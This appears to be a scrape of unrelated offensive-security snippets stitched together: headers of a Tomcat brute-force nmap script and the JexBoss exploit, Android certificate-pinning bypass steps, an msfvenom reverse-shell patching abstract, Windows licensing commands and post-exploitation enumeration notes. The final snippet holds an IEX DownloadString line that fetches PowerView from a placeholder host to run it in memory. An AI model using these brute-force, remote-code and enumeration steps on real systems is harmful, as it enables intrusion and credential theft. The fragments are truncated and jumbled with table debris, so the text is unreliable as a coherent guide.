###To laptop
Specify an IP address to eth0 (here 192.168.56.1)
sudo ifconfig eth0 192.168.56.1 netmask 255.255.255.0
| local shortport = require "shortport" | |
| local http = require "http" | |
| local stdnse = require "stdnse" | |
| local brute = require "brute" | |
| local creds = require "creds" | |
| description = [[ | |
| Performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages. | |
| ]] |
| #coding: utf-8 | |
| ''' | |
| -------------------------------------------------------------------------------------- | |
| # [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected]) | |
| # [+] Updates: https://github.com/joaomatosf/jexboss | |
| # [+] SCRIPT original: http://1337day.com/exploit/23507 | |
| # [+] Free for distribution and modification, but the authorship should be preserved. | |
| -------------------------------------------------------------------------------------- | |
| [+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] |
| https://dl.google.com/android/repository/tools_r25.2.3-windows.zip | |
| https://medium.com/@felipecsl/bypassing-certificate-pinning-on-android-for-fun-and-profit-1b0d14beab2b#.pnph846be | |
| http://www.security-assessment.com/files/documents/whitepapers/Bypassing%20SSL%20Pinning%20on%20Android%20via%20Reverse%20Engineering.pdf | |
| 1) download apktool and the build tools (http://androidsdkoffline.blogspot.com/p/android-sdk-build-tools.html) and platform tools (https://developer.android.com/studio/releases/platform-tools.html) | |
| "C:\Users\mbrown\Desktop\Sense APK\apktool" d base.apk | |
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
| Windows.10.and.Office.2016.gVLK | |
| ##################################################################### | |
| # Install/Uninstall keys # | |
| ##################################################################### | |
| 1.) Uninstall the current product by entering the “uninstall product key” extension: | |
| slmgr.vbs /upk | |
| 2.) Install the key that you obtained above for “Windows Srv 2012R2 DataCtr/Std KMS for Windows 10” |
Open PowerShell (right click > run as Administrator), and enter
Get-AppxPackage *photo* | Remove-AppxPackage
For other apps just replace "photo" with something else.
If you want to look at the list of installed applications just use Get-AppxPackage,
if you want to copy said list into a program better suited for working with text (eg. has search), just type Get-AppxPackage | clip
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
| # Import PowerView into memory without touching disk | |
| # IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
| ################################### | |
| # Hunting for Users | |
| ################################### | |
| # search for administrator groups |